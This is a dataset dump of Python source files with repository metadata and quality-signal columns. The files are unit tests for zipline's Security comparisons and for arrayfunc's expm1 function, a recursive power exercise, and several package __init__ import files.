hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d6605fb6aa0b0428f034e1151a95d0debf0a5bd6 | 1,149 | py | Python | tests/test_security_object.py | dalejung/zipline | e19f02a2ecb24baebddbeb17060d7b068c710e4d | [
"Apache-2.0"
] | null | null | null | tests/test_security_object.py | dalejung/zipline | e19f02a2ecb24baebddbeb17060d7b068c710e4d | [
"Apache-2.0"
] | null | null | null | tests/test_security_object.py | dalejung/zipline | e19f02a2ecb24baebddbeb17060d7b068c710e4d | [
"Apache-2.0"
] | null | null | null | from unittest import TestCase
from zipline.assets._securities import Security
class TestSecurityRichCmp(TestCase):
    def test_lt(self):
        self.assertTrue(Security(3) < Security(4))
        self.assertFalse(Security(4) < Security(4))
        self.assertFalse(Security(5) < Security(4))

    def test_le(self):
        self.assertTrue(Security(3) <= Security(4))
        self.assertTrue(Security(4) <= Security(4))
        self.assertFalse(Security(5) <= Security(4))

    def test_eq(self):
        self.assertFalse(Security(3) == Security(4))
        self.assertTrue(Security(4) == Security(4))
        self.assertFalse(Security(5) == Security(4))

    def test_ge(self):
        self.assertFalse(Security(3) >= Security(4))
        self.assertTrue(Security(4) >= Security(4))
        self.assertTrue(Security(5) >= Security(4))

    def test_gt(self):
        self.assertFalse(Security(3) > Security(4))
        self.assertFalse(Security(4) > Security(4))
        self.assertTrue(Security(5) > Security(4))

    def test_type_mismatch(self):
        self.assertIsNotNone(Security(3) < 'a')
        self.assertIsNotNone('a' < Security(3))
| 33.794118 | 52 | 0.644909 | 138 | 1,149 | 5.311594 | 0.195652 | 0.245566 | 0.177353 | 0.122783 | 0.740791 | 0.740791 | 0.740791 | 0.740791 | 0.665757 | 0.665757 | 0 | 0.035204 | 0.208877 | 1,149 | 33 | 53 | 34.818182 | 0.771177 | 0 | 0 | 0 | 0 | 0 | 0.001741 | 0 | 0 | 0 | 0 | 0 | 0.653846 | 1 | 0.230769 | false | 0 | 0.076923 | 0 | 0.346154 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d673ed5838562523a0ab38fe0e6db3649dae24f4 | 180 | py | Python | ADVANCED_MODULE/05_Functions_Advanced/LAB/06_Recursive_Power.py | sleepychild/SoftUni_SE | ae94488befb6de8b74ffdcb14ed6470739a67786 | [
"MIT"
] | null | null | null | ADVANCED_MODULE/05_Functions_Advanced/LAB/06_Recursive_Power.py | sleepychild/SoftUni_SE | ae94488befb6de8b74ffdcb14ed6470739a67786 | [
"MIT"
] | 1 | 2022-01-15T10:33:56.000Z | 2022-01-15T10:33:56.000Z | ADVANCED_MODULE/05_Functions_Advanced/LAB/06_Recursive_Power.py | sleepychild/SoftUni_SE | ae94488befb6de8b74ffdcb14ed6470739a67786 | [
"MIT"
] | null | null | null | def recursive_power(number, power):
    return number * recursive_power(number, power - 1) if power > 1 else number
print(recursive_power(2, 10))
print(recursive_power(10, 100))
| 25.714286 | 79 | 0.744444 | 27 | 180 | 4.814815 | 0.444444 | 0.430769 | 0.307692 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064935 | 0.144444 | 180 | 6 | 80 | 30 | 0.779221 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0.25 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 8 |
d6770548cd1cd12f77e347616ca5c72e3326ccb3 | 124 | py | Python | pycspr/serialisation/json/cl_value/__init__.py | hboshnak/casper-python-sdk | 19db9bf3b4720d5b4e133463e5a32fd64f1c33ed | [
"Apache-2.0"
] | null | null | null | pycspr/serialisation/json/cl_value/__init__.py | hboshnak/casper-python-sdk | 19db9bf3b4720d5b4e133463e5a32fd64f1c33ed | [
"Apache-2.0"
] | null | null | null | pycspr/serialisation/json/cl_value/__init__.py | hboshnak/casper-python-sdk | 19db9bf3b4720d5b4e133463e5a32fd64f1c33ed | [
"Apache-2.0"
] | null | null | null | from pycspr.serialisation.json.cl_value.decoder import decode
from pycspr.serialisation.json.cl_value.encoder import encode
| 41.333333 | 61 | 0.870968 | 18 | 124 | 5.888889 | 0.611111 | 0.188679 | 0.433962 | 0.509434 | 0.641509 | 0.641509 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 124 | 2 | 62 | 62 | 0.913793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d6ce8eaf5468eca8dcbec8ddbb8ea26cf5f1b3ae | 111 | py | Python | fastapi_helpers/routes/middlewares/__init__.py | finalsa/fastapi-helpers | 3fc06e4445e29416876822d3f9485c65c51886cc | [
"MIT"
] | 2 | 2021-09-19T00:56:42.000Z | 2022-01-19T06:13:45.000Z | fastapi_helpers/routes/middlewares/__init__.py | finalsa/fastapi-helpers | 3fc06e4445e29416876822d3f9485c65c51886cc | [
"MIT"
] | 1 | 2021-11-27T18:05:08.000Z | 2021-12-24T02:42:11.000Z | fastapi_helpers/routes/middlewares/__init__.py | finalsa/fastapi-helpers | 3fc06e4445e29416876822d3f9485c65c51886cc | [
"MIT"
] | 1 | 2021-12-23T07:21:56.000Z | 2021-12-23T07:21:56.000Z | from .HeadersMiddleware import HeadersMiddleware
from .get_real_ip import get_real_ip, get_real_ip_from_headers | 55.5 | 62 | 0.900901 | 17 | 111 | 5.411765 | 0.411765 | 0.228261 | 0.293478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072072 | 111 | 2 | 62 | 55.5 | 0.893204 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d6d600c8968ec4e7ff3aa81d5a261feb4b36a4a8 | 208 | py | Python | data/__init__.py | sin-en-2009/NeuRec | 74fe762f8dfb911e5b736f98e9cbec1df52acb10 | [
"MIT"
] | 1 | 2021-07-14T23:11:43.000Z | 2021-07-14T23:11:43.000Z | data/__init__.py | sin-en-2009/NeuRec | 74fe762f8dfb911e5b736f98e9cbec1df52acb10 | [
"MIT"
] | null | null | null | data/__init__.py | sin-en-2009/NeuRec | 74fe762f8dfb911e5b736f98e9cbec1df52acb10 | [
"MIT"
] | null | null | null | from .parallel_sampler import PointwiseSampler
from .parallel_sampler import PairwiseSampler
from .parallel_sampler import TimeOrderPointwiseSampler
from .parallel_sampler import TimeOrderPairwiseSampler
| 41.6 | 56 | 0.884615 | 20 | 208 | 9 | 0.4 | 0.266667 | 0.422222 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096154 | 208 | 4 | 57 | 52 | 0.957447 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
d6f45313d31a4e78839753aea1c2bc42175292e5 | 39,905 | py | Python | unittest/test_expm1.py | m1griffin/arrayfunc | df57097699c25d3e949e1ade307ed61eaa5728c2 | [
"Apache-2.0"
] | 2 | 2017-08-28T08:41:16.000Z | 2018-05-29T03:49:36.000Z | unittest/test_expm1.py | m1griffin/arrayfunc | df57097699c25d3e949e1ade307ed61eaa5728c2 | [
"Apache-2.0"
] | null | null | null | unittest/test_expm1.py | m1griffin/arrayfunc | df57097699c25d3e949e1ade307ed61eaa5728c2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
##############################################################################
# Project: arrayfunc
# Module: test_expm1.py
# Purpose: arrayfunc unit test.
# Language: Python 3.4
# Date: 09-Dec-2017.
# Ver: 06-Mar-2020.
#
###############################################################################
#
# Copyright 2014 - 2020 Michael Griffin <m12.griffin@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
##############################################################################
"""This conducts unit tests for expm1.
"""
##############################################################################
import sys
import array
import itertools
import math
import operator
import platform
import copy
import unittest
import arrayfunc
##############################################################################
##############################################################################
# The following code is all auto-generated.
##############################################################################
class expm1_general_even_arraysize_without_simd_f(unittest.TestCase):
    """Test for basic general function operation.
    test_template_noparams
    """

    ##############################################################################
    def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
        """This function is patched into assertEqual to allow testing for
        the floating point special values NaN, Inf, and -Inf.
        """
        # NaN cannot be compared using normal means.
        if math.isnan(dataoutitem) and math.isnan(expecteditem):
            pass
        # Anything else can be compared normally.
        else:
            if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
                raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))

    ########################################################
    def setUp(self):
        """Initialise.
        """
        self.addTypeEqualityFunc(float, self.FloatassertEqual)

        if 'even' == 'even':
            testdatasize = 160
        if 'even' == 'odd':
            testdatasize = 159

        paramitersize = 5
        xdata = [x for x, y in zip(itertools.cycle([0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0]), range(testdatasize))]
        self.data = array.array('f', xdata)
        self.dataout = array.array('f', [0] * len(self.data))

        self.limited = len(self.data) // 2

        # The expected results.
        self.expected = [math.expm1(x) for x in self.data]

        # The expected results when the maxlen parameter is used.
        self.expectedlimiteddata = self.expected[0:self.limited] + list(self.data)[self.limited:]

        # The same, but where dataout is used as one of the sources.
        self.expectedlimiteddataout = self.expected[0:self.limited] + list(self.dataout)[self.limited:]

    ########################################################
    def test_expm1_basic_array_none_a1(self):
        """Test expm1 as *array-none* for basic function - Array code f.
        """
        arrayfunc.expm1(self.data)

        for dataoutitem, expecteditem in zip(list(self.data), self.expected):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)

    ########################################################
    def test_expm1_basic_array_none_a2(self):
        """Test expm1 as *array-none* for basic function with matherrors=True - Array code f.
        """
        arrayfunc.expm1(self.data, matherrors=True)

        for dataoutitem, expecteditem in zip(list(self.data), self.expected):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)

    ########################################################
    def test_expm1_basic_array_none_a3(self):
        """Test expm1 as *array-none* for basic function with maxlen - Array code f.
        """
        arrayfunc.expm1(self.data, maxlen=self.limited)

        for dataoutitem, expecteditem in zip(list(self.data), self.expectedlimiteddata):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)

    ########################################################
    def test_expm1_basic_array_none_a4(self):
        """Test expm1 as *array-none* for basic function with maxlen and matherrors=True - Array code f.
        """
        arrayfunc.expm1(self.data, maxlen=self.limited, matherrors=True)

        for dataoutitem, expecteditem in zip(list(self.data), self.expectedlimiteddata):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)

    ########################################################
    def test_expm1_basic_array_array_b1(self):
        """Test expm1 as *array-array* for basic function - Array code f.
        """
        arrayfunc.expm1(self.data, self.dataout)

        for dataoutitem, expecteditem in zip(list(self.dataout), self.expected):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)

    ########################################################
    def test_expm1_basic_array_array_b2(self):
        """Test expm1 as *array-array* for basic function with matherrors=True - Array code f.
        """
        arrayfunc.expm1(self.data, self.dataout, matherrors=True)

        for dataoutitem, expecteditem in zip(list(self.dataout), self.expected):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)

    ########################################################
    def test_expm1_basic_array_array_b3(self):
        """Test expm1 as *array-array* for basic function with maxlen - Array code f.
        """
        arrayfunc.expm1(self.data, self.dataout, maxlen=self.limited)

        for dataoutitem, expecteditem in zip(list(self.dataout), self.expectedlimiteddataout):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)

    ########################################################
    def test_expm1_basic_array_array_b4(self):
        """Test expm1 as *array-array* for basic function with maxlen and matherrors=True - Array code f.
        """
        arrayfunc.expm1(self.data, self.dataout, maxlen=self.limited, matherrors=True)

        for dataoutitem, expecteditem in zip(list(self.dataout), self.expectedlimiteddataout):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)
##############################################################################
##############################################################################
class expm1_param_errors_f(unittest.TestCase):
    """Test for invalid parameters.
    param_invalid_template
    """

    ########################################################
    def setUp(self):
        """Initialise.
        """
        self.floatarray = array.array('f', [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0])

        arraysize = len(self.floatarray)

        self.dataout = array.array('f', itertools.repeat(0.0, arraysize))

        # Create some integer array equivalents.
        self.intarray = array.array('i', [int(x) for x in self.floatarray])
        self.intdataout = array.array('i', [int(x) for x in self.dataout])

    ########################################################
    def test_expm1_array_none_a1(self):
        """Test expm1 as *array-none* for integer array - Array code f.
        """
        # This version is expected to pass.
        arrayfunc.expm1(self.floatarray)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(self.intarray)

    ########################################################
    def test_expm1_array_none_b1(self):
        """Test expm1 as *array-none* for matherrors='a' - Array code f.
        """
        # Copy the array so we don't change the original data.
        floatarray = copy.copy(self.floatarray)

        # This version is expected to pass.
        arrayfunc.expm1(floatarray, matherrors=True)

        floatarray = copy.copy(self.floatarray)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(floatarray, matherrors='a')

    ########################################################
    def test_expm1_array_none_b2(self):
        """Test expm1 as *array-none* for maxlen='a' - Array code f.
        """
        # Copy the array so we don't change the original data.
        floatarray = copy.copy(self.floatarray)
        testmaxlen = len(floatarray) // 2

        # This version is expected to pass.
        arrayfunc.expm1(floatarray, maxlen=testmaxlen)

        floatarray = copy.copy(self.floatarray)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(floatarray, maxlen='a')

    ########################################################
    def test_expm1_array_array_c1(self):
        """Test expm1 as *array-array* for integer array - Array code f.
        """
        # This version is expected to pass.
        arrayfunc.expm1(self.floatarray, self.dataout)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(self.intarray, self.dataout)

    ########################################################
    def test_expm1_array_array_c2(self):
        """Test expm1 as *array-array* for integer output array - Array code f.
        """
        # This version is expected to pass.
        arrayfunc.expm1(self.floatarray, self.dataout)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(self.floatarray, self.intdataout)

    ########################################################
    def test_expm1_array_array_c3(self):
        """Test expm1 as *array-array* for integer input and output array - Array code f.
        """
        # This version is expected to pass.
        arrayfunc.expm1(self.floatarray, self.dataout)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(self.intarray, self.intdataout)

    ########################################################
    def test_expm1_array_num_array_d1(self):
        """Test expm1 as *array-num-array* for matherrors='a' - Array code f.
        """
        # This version is expected to pass.
        arrayfunc.expm1(self.floatarray, self.dataout, matherrors=True)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(self.floatarray, self.dataout, matherrors='a')

    ########################################################
    def test_expm1_array_array_d2(self):
        """Test expm1 as *array-array* for maxlen='a' - Array code f.
        """
        testmaxlen = len(self.floatarray) // 2

        # This version is expected to pass.
        arrayfunc.expm1(self.floatarray, self.dataout, maxlen=testmaxlen)

        floatarray = copy.copy(self.floatarray)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(self.floatarray, self.dataout, maxlen='a')

    ########################################################
    def test_expm1_no_params_e1(self):
        """Test expm1 with no parameters - Array code f.
        """
        with self.assertRaises(TypeError):
            arrayfunc.expm1()
##############################################################################
##############################################################################
class expm1_general_even_arraysize_without_simd_d(unittest.TestCase):
    """Test for basic general function operation.
    test_template_noparams
    """

    ##############################################################################
    def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
        """This function is patched into assertEqual to allow testing for
        the floating point special values NaN, Inf, and -Inf.
        """
        # NaN cannot be compared using normal means.
        if math.isnan(dataoutitem) and math.isnan(expecteditem):
            pass
        # Anything else can be compared normally.
        else:
            if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
                raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))

    ########################################################
    def setUp(self):
        """Initialise.
        """
        self.addTypeEqualityFunc(float, self.FloatassertEqual)

        if 'even' == 'even':
            testdatasize = 160
        if 'even' == 'odd':
            testdatasize = 159

        paramitersize = 5
        xdata = [x for x, y in zip(itertools.cycle([0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0]), range(testdatasize))]
        self.data = array.array('d', xdata)
        self.dataout = array.array('d', [0] * len(self.data))

        self.limited = len(self.data) // 2

        # The expected results.
        self.expected = [math.expm1(x) for x in self.data]

        # The expected results when the maxlen parameter is used.
        self.expectedlimiteddata = self.expected[0:self.limited] + list(self.data)[self.limited:]

        # The same, but where dataout is used as one of the sources.
        self.expectedlimiteddataout = self.expected[0:self.limited] + list(self.dataout)[self.limited:]

    ########################################################
    def test_expm1_basic_array_none_a1(self):
        """Test expm1 as *array-none* for basic function - Array code d.
        """
        arrayfunc.expm1(self.data)

        for dataoutitem, expecteditem in zip(list(self.data), self.expected):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)

    ########################################################
    def test_expm1_basic_array_none_a2(self):
        """Test expm1 as *array-none* for basic function with matherrors=True - Array code d.
        """
        arrayfunc.expm1(self.data, matherrors=True)

        for dataoutitem, expecteditem in zip(list(self.data), self.expected):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)

    ########################################################
    def test_expm1_basic_array_none_a3(self):
        """Test expm1 as *array-none* for basic function with maxlen - Array code d.
        """
        arrayfunc.expm1(self.data, maxlen=self.limited)

        for dataoutitem, expecteditem in zip(list(self.data), self.expectedlimiteddata):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)

    ########################################################
    def test_expm1_basic_array_none_a4(self):
        """Test expm1 as *array-none* for basic function with maxlen and matherrors=True - Array code d.
        """
        arrayfunc.expm1(self.data, maxlen=self.limited, matherrors=True)

        for dataoutitem, expecteditem in zip(list(self.data), self.expectedlimiteddata):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)

    ########################################################
    def test_expm1_basic_array_array_b1(self):
        """Test expm1 as *array-array* for basic function - Array code d.
        """
        arrayfunc.expm1(self.data, self.dataout)

        for dataoutitem, expecteditem in zip(list(self.dataout), self.expected):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)

    ########################################################
    def test_expm1_basic_array_array_b2(self):
        """Test expm1 as *array-array* for basic function with matherrors=True - Array code d.
        """
        arrayfunc.expm1(self.data, self.dataout, matherrors=True)

        for dataoutitem, expecteditem in zip(list(self.dataout), self.expected):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)

    ########################################################
    def test_expm1_basic_array_array_b3(self):
        """Test expm1 as *array-array* for basic function with maxlen - Array code d.
        """
        arrayfunc.expm1(self.data, self.dataout, maxlen=self.limited)

        for dataoutitem, expecteditem in zip(list(self.dataout), self.expectedlimiteddataout):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)

    ########################################################
    def test_expm1_basic_array_array_b4(self):
        """Test expm1 as *array-array* for basic function with maxlen and matherrors=True - Array code d.
        """
        arrayfunc.expm1(self.data, self.dataout, maxlen=self.limited, matherrors=True)

        for dataoutitem, expecteditem in zip(list(self.dataout), self.expectedlimiteddataout):
            # The behaviour of assertEqual is modified by addTypeEqualityFunc.
            self.assertEqual(dataoutitem, expecteditem)
##############################################################################
##############################################################################
class expm1_param_errors_d(unittest.TestCase):
    """Test for invalid parameters.
    param_invalid_template
    """

    ########################################################
    def setUp(self):
        """Initialise.
        """
        self.floatarray = array.array('d', [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0])

        arraysize = len(self.floatarray)

        self.dataout = array.array('d', itertools.repeat(0.0, arraysize))

        # Create some integer array equivalents.
        self.intarray = array.array('i', [int(x) for x in self.floatarray])
        self.intdataout = array.array('i', [int(x) for x in self.dataout])

    ########################################################
    def test_expm1_array_none_a1(self):
        """Test expm1 as *array-none* for integer array - Array code d.
        """
        # This version is expected to pass.
        arrayfunc.expm1(self.floatarray)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(self.intarray)

    ########################################################
    def test_expm1_array_none_b1(self):
        """Test expm1 as *array-none* for matherrors='a' - Array code d.
        """
        # Copy the array so we don't change the original data.
        floatarray = copy.copy(self.floatarray)

        # This version is expected to pass.
        arrayfunc.expm1(floatarray, matherrors=True)

        floatarray = copy.copy(self.floatarray)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(floatarray, matherrors='a')

    ########################################################
    def test_expm1_array_none_b2(self):
        """Test expm1 as *array-none* for maxlen='a' - Array code d.
        """
        # Copy the array so we don't change the original data.
        floatarray = copy.copy(self.floatarray)
        testmaxlen = len(floatarray) // 2

        # This version is expected to pass.
        arrayfunc.expm1(floatarray, maxlen=testmaxlen)

        floatarray = copy.copy(self.floatarray)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(floatarray, maxlen='a')

    ########################################################
    def test_expm1_array_array_c1(self):
        """Test expm1 as *array-array* for integer array - Array code d.
        """
        # This version is expected to pass.
        arrayfunc.expm1(self.floatarray, self.dataout)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(self.intarray, self.dataout)

    ########################################################
    def test_expm1_array_array_c2(self):
        """Test expm1 as *array-array* for integer output array - Array code d.
        """
        # This version is expected to pass.
        arrayfunc.expm1(self.floatarray, self.dataout)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(self.floatarray, self.intdataout)

    ########################################################
    def test_expm1_array_array_c3(self):
        """Test expm1 as *array-array* for integer input and output array - Array code d.
        """
        # This version is expected to pass.
        arrayfunc.expm1(self.floatarray, self.dataout)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(self.intarray, self.intdataout)

    ########################################################
    def test_expm1_array_num_array_d1(self):
        """Test expm1 as *array-num-array* for matherrors='a' - Array code d.
        """
        # This version is expected to pass.
        arrayfunc.expm1(self.floatarray, self.dataout, matherrors=True)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(self.floatarray, self.dataout, matherrors='a')

    ########################################################
    def test_expm1_array_array_d2(self):
        """Test expm1 as *array-array* for maxlen='a' - Array code d.
        """
        testmaxlen = len(self.floatarray) // 2

        # This version is expected to pass.
        arrayfunc.expm1(self.floatarray, self.dataout, maxlen=testmaxlen)

        floatarray = copy.copy(self.floatarray)

        # This is the actual test.
        with self.assertRaises(TypeError):
            arrayfunc.expm1(self.floatarray, self.dataout, maxlen='a')

    ########################################################
